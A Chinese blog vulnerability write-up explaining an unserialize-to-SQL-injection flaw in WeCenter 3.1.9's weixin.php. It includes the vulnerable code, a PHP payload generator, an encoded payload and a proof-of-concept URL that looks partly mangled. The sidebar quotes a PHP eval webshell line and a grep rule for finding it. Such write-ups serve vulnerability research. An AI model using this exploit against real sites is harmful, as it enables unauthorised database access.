php微信漏洞,wecenter 3.1.9 /app/m/weixin.php 反序列化造成SQL注入漏洞

最新推荐文章于 2022-03-24 13:08:36 发布
最新推荐文章于 2022-03-24 13:08:36 发布
阅读量325 收藏
点赞数
文章标签: php微信漏洞

wecenter 3.1.9 /app/m/weixin.php 文件中,对传入的参数反序列化后直接构造SQL语句进行查询,导致SQL注入漏洞

漏洞文件:/app/m/weixin.php:110

相关代码public function authorization_action()

{

$this->model('account')->logout();

unset(AWS_APP::session()->WXConnect);

if (get_setting('weixin_account_role') != 'service')

{

H::redirect_msg(AWS_APP::lang()->_t('此功能只适用于通过微信认证的服务号'));

}

else if ($_GET['code'] OR $_GET['state'] == 'OAUTH')

{

if ($_GET['state'] == 'OAUTH')

{

$access_token = unserialize(base64_decode($_GET['access_token']));

}

...

上面这句话将$_GET['access_token']解码以后进行反序列化。当然这个点存在利用条件,那就是get_setting('weixin_account_role') != 'service',需要后台设置了微信认证服务号,

这里有__destruct函数,我们可以看到,这里直接遍历了_shutdown_query对象,将其值传入query直接执行。

明显存在一个任意SQL语句执行漏洞,只要我生成一个AWS_MODEL类对象,再其销毁的时候就能执行任意SQL语句。

构造的反序列化对象是一个数组,数组的第一个元素是error => true,第二个元素就是AWS_MODEL类对象。 代码如下:<?php

class AWS_MODEL {

private $_shutdown_query;

function __construct()

{

$this->_shutdown_query = [

"SELECT updatexml(1,concat(0xa,md5(1)),1)"

];

}

}

$arr = [

'errcode' => 1,

new AWS_MODEL()

];

echo urlencode(base64_encode(serialize($arr)));

?>

生成出来的:YToyOntzOjc6ImVycmNvZGUiO2k6MTtpOjA7Tzo5OiJBV1NfTU9ERUwiOjE6e3M6MjY6IgBBV1NfTU9ERUwAX3NodXRkb3duX3F1ZXJ5IjthOjE6e2k6MDtzOjQwOiJTRUxFQ1QgdXBkYXRleG1sKDEsY29uY2F0KDB4YSxtZDUoMSkpLDEpIjt9fX0%3D

完整POC:?/m/weixin/authorization/=OAUTH=YToyOntzOjc6ImVycmNvZGUiO2k6MTtpOjA7Tzo5OiJBV1NfTU9ERUwiOjE6e3M6MjY6IgBBV1NfTU9ERUwAX3NodXRkb3duX3F1ZXJ5IjthOjE6e2k6MDtzOjQwOiJTRUxFQ1QgdXBkYXRleG1sKDEsY29uY2F0KDB4YSxtZDUoMSkpLDEpIjt9fX0%3D

例子:http://xxxxxxxxx/?/m/weixin/authorization/=OAUTH=YToyOntzOjc6ImVycmNvZGUiO2k6MTtpOjA7Tzo5OiJBV1NfTU9ERUwiOjE6e3M6MjY6IgBBV1NfTU9ERUwAX3NodXRkb3duX3F1ZXJ5IjthOjE6e2k6MDtzOjQwOiJTRUxFQ1QgdXBkYXRleG1sKDEsY29uY2F0KDB4YSxtZDUoMSkpLDEpIjt9fX0%3D

ad764e8acb059e9a94dccda9abb64061.png

deep go
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WeCenter社交化问答系统 v3.1.9社交问答 问答系统 问答程序
05-24
Wecenter(微中心系统软件)是一款由深圳市微客互动有限公司开发的具有完全自主知识产权的开源软件。它安全,可靠,快速更迭,可以迅速帮助企业和组织通过微信,微薄,APP,网页社区等交互模式建立和客户之间的互动联系,积累知识要点,降低同质化内容的咨询成本和人力服务成本。让内容可以协同编辑,可以评价,可以快递分类和定位,建立符合企业和组织需求的结构化知识库。 Wecenter是通过积累来源于微信,微薄,APP,社区等用户的碎片信息,利用社交互动的模式,分析数据,提炼数据,最终帮助企业和组织积累符合他们需求的知识百科! WeCenter是一个微信公众平台社区解决方案,用户在服务器安装了WeCenter,可以快速把微信服务号菜单功能和对应WeCenter的内容发起,内容分类,以及用户中心关联起来。关注微信公众帐号的用户,会同步生成WeCenter社区用户,WeCenter社区的内容通知会通过微信客服接口推送给关联用户,产生互动。2014年,我们筹备在WeCenter基础上提供更多的微信服务产品给需要的用户,比如微信活动,微信名片,微信投票,以及相关增加社区人气的工具。 WeCenter v3.1.9 更新日志: Web 版模板设计调整 手机版模板重构
由正则引起的 Wecenter 拒绝服务漏洞
weixin_34128839的博客
09-12 185
本文讲的是由正则引起的 Wecenter 拒绝服务漏洞,一年前在前公司搭建了一个wecenter程序的社区,忽然有一天发现社区打开首页都会超时,后面排查发现是php超时了,当时知道是文章引起的,但是手上还有其他项目在写,就没去跟,把文章删了就没去管他了。 直到前两个星期再次发现了这种问题,刚好手上也没什么事情,就抽空去跟了下代码。 漏洞形成原因: ...
SQL注入
three_year的博客
04-24 310
什么是SQL注入 SQL注入是是指Web应用程序对用户输入数据的合法性合法性没有进行判断,就把输入的数据传递到后端并带入数据库进行查询,导致攻击者可以对数据库进行任意操作。 常见的SQL注入:报错注入、盲注、Union注入、Boolean注入等 SQL注入产生的原理 SQL注入漏洞产生需要满足两个条件: 1.参数用户可控:前端传给后端的参数是由用户控制的 2.参数带入数据库查询:用户输入的参数会...
WeCenter3.1.7 blind xxe
u011066706的专栏
04-17 1057
xxe漏洞危害大,可以查看任意文件,执行系统命令,进行ddos等,但是本次漏洞有一条件,需要后台登录,所以危害降低了,下面是详细分析 在models/weixin.php public function fetch_message() { if ($this->post_data = file_get_contents('php://input'))
Fakebook---反序列化+sql注入+ssrf
q1415500189的博客
01-24 830
Fakebook---反序列化+sql注入+ssrf
SAP Java JCo 3.1.9 Windows 平台 32bit / 64bit.7z
04-28
SAP Java JCo 3.1.9 Windows 平台 32bit / 64bit The SAP Java Connector (SAP JCo) is a development library that enables a Java application to communicate with SAP systems via SAP's RFC protocol. The ...
WeCenter社交化问答系统 v3.1.9.rar
07-10
WeCenter社交化问答系统,可以快速把微信服务号菜单功能和对应WeCenter的内容发起,内容分类,以及用户中心关联起来。关注微信公众帐号的用户,会同步生成WeCenter社区用户,WeCenter社区的内容通知会通过微信客服...
WeCenter社交化问答系统 v3.1.9
12-10
Wecenter(微中心系统软件)是一款由深圳市微客互动有限...它安全,可靠,快速更迭,可以迅速帮助企业和组织通过微信,微薄,APP,网页社区等交互模式建立和客户之间的互动联系,积累知识要点,降低同质化内容的咨询
基于PHP的BB 3.1.9 繁体中文版.zip
07-18
5. 安全性:作为论坛系统,BB会定期发布安全更新,以防范SQL注入、XSS攻击等网络安全威胁。 **繁体中文支持:** 1. 本地化:BB 3.1.9包含繁体中文语言包,确保用户界面完全翻译为繁体中文,方便台湾、香港等地的...
基于PHP的BB3.1.9繁体中文版源码.zip
07-29
【标题】"基于PHP的BB3.1.9繁体中文版源码.zip" 提供的是一个使用PHP语言开发的论坛系统源代码,版本为BB3.1.9,并且针对繁体中文用户进行了本地化处理。这个源码可能是为了方便开发者、网站管理员或者爱好者在构建...
WeCenter(原Anwsion) 社会化问答系统 v3.3.0.zip
07-07
WeCenter(原Anwsion) 社会化问答系统 v3.3.0 更新日志   短信功能基础模块添加(三种短信通道可供选择)   支付功能基础模块添加(支付宝、微信、余额) 删除改为逻辑删除(文章/问题/用户) 内容审核增加了对文章评论问题评论和回答评论的审核 后台菜单改为数据库储存和维护 新增插件管理(后续可支持插件的安装与卸载,结合应用市场) **配合手机注册插件可实现手机号注册登录 修改加入收藏的逻辑 修复了分享导致内容脚本被执行的漏洞 升级程序修改 (支持官方版本的跨版本升级,修复了升级过程中出错而无法再升级问题) 后台增加了对违规用户IP的封禁 社区反映问题修改   WeCenter(原Anwsion) 社会化问答系统简介 Wecenter(微中心系统软件)是一款由深圳市微客互动有限公司开发的具有完全自主知识产权的开源软件。它安全,可靠,快速更迭,可以迅速帮助企业和组织通过微信,微薄,APP,网页社区等交互模式建立和客户之间的互动联系,积累知识要点,降低同质化内容的咨询成本和人力服务成本。让内容可以协同编辑,可以评价,可以快递分类和定位,建立符合企业和组织需求的结构化知识库。 通过微信公众帐号的对接,Wecenter利用结构化知识库和自然语言的检索,让企业拥有一个专业化的智能交流服务(类似苹果siri),建立一个微信端的crm系统。通过微薄的帐号管理,可以及时的了解微薄数据流中提到的关键信息,帮助企业和组织快速反映并提交解决方案。通过APP和网页社区,企业和组织可以和用户进行社交互动,并通过邀请,赞同,感谢等动作,发现优秀的人才和观点。 Wecenter是通过积累来源于微信,微薄,APP,社区等用户的碎片信息,利用社交互动的模式,分析数据,提炼数据,最终帮助企业和组织积累符合他们需求的知识百科!  WeCenter(原Anwsion) 社会化问答系统前台页面  WeCenter(原Anwsion) 社会化问答系统后台管理 后台路径:域名//?/admin/ 用户名与密码:admin admin123(安装时可设置) 后台页面: 相关阅读 同类推荐:站长常用源码
WeCenter管理中心手册
08-02
WeCenter管理中心手册,官方发布的站长指南。
WeCenter社交化问答社区程序 3.3.0.zip
05-23
WeCenter是一款知识型的社交化问答开源社区程序,专注于企业和行业社区内容的整理、归类、检索和再发行。 WeCenter 3.3.0 更新日志:2018-12-10 短信功能基础模块添加(三种短信通道可供选择);支付功能基础模块添加(支付宝、微信、余额);删除改为逻辑删除(文章/问题/用户);内容审核增加了对文章评论问题评论和回答评论的审核;后台菜单改为数据库储存和维护;新增插件管理(后续可支持插件的安装与卸载,结合应用市场);--配合手机注册插件可实现手机号注册登录;修改加入修藏的逻辑;修复了分享导致内容脚本被执行的漏洞;升级程序修改(支持官方版本的跨版本升级,修复了升级过程中出错而无法再升级问题);后台增加了对违规用户IP的封禁;社区反映问题修改。
php漏洞处理
weixin_33863087的博客
10-29 131
php***一般含有<?php eval($_POST[cmd]);?>或者<?php assert($_POST[cmd]);?>find ./ -type f -name "*" | xargs grep "eval("http://bbs.dianlan.cn/phpimg/bbs/upload/2731435152797.jpg/.php373...
php漏洞几十个,需要注意的几个PHP漏洞
weixin_39630771的博客
03-26 222
需要注意的几个PHP漏洞几个重要的php.ini选项Register Globalsphp>=4.2.0,php.ini的register_globals选项的默认值预设为Off,当register_globals的设定为On时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于PHP不必事先初始化变量的值,从而导致很大的安全隐患.例1://check_admin()用于检查...
Wecenter,Wecenter程序,Wecenter问答系统
xiaomaseo的博客
03-24 792
Wecenter,是建立知识社区的开源程序。Wecenter以可检索、归类、整理的问答形式,Wecenter帮助个人、企业网站等组织搭建自己的知识库。用户可主动查询获取产品和服务的说明内容,通过问答互动,加强组织和用户之间的社交粘性。WeCenter知识社区的积分、打赏、分享等功能,激发用户主动创作内容,扩散有价值的信息,从而有利于网站建设和网站推广、网站知名度打造。 Wecenter是开放源码,便捷开发,采用经典MVC 架构,利用成熟开发技术,开放系统源码和开发文档,让二次开发更容易。加上其弹.
php微信支付漏洞,微信支付官方紧急推送关于修复XXE漏洞提示,附修复方案
weixin_29797343的博客
03-23 152
昨天有一条关于微信支付0元购的消息在开发圈里炸开了锅,所谓0元购并不是用户抽奖,而是恶意攻击者利用漏洞实现0元支付。正常的支付基本流程是这样的:用户发起支付->调起微信支付->支付成功->微信支付服务器发送成功通知给应用(比如某个商城)服务端->应用服务端解析微信支付发送的通知->解析后的信息进行必要对比确认后更新订单为已付款状态。然而该漏洞,就是恶意利用解析过程,可...
反序列化漏洞汇总
buffedon的博客
07-15 4151
JAVA反序列化PHP反序列化,场景容器反序列化利用过程
php微信登录因为code登录失败,截取code后面的字符串,重新加载
qq_34297991的博客
06-08 197
$url='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $url = substr($url,0,strpos($url,'code')); Header("Location: ".$url);exit(); 记得一定要写exit();
<dependency> <groupId>org.noear</groupId> <artifactId>snack3</artifactId> <version>3.1.9</version></depende
最新发布
05-30
根据提供的内容可以看出这是一个 Maven 项目的依赖信息,其中 `groupId`、`artifactId` 和 `version` 分别表示项目的组 ID、模块 ID 和版本号。 如果你需要使用 Maven 项目中的 `snack3` 模块,可以将以下内容添加到你的 `pom.xml` 文件中的 `<dependencies>` 标签内: ```xml <dependency> <groupId>org.noear</groupId> <artifactId>snack3</artifactId> <version>3.1.9</version> </dependency> ``` 其中 `org.noear` 是项目的组 ID,`snack3` 是模块 ID,`3.1.9` 是版本号。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值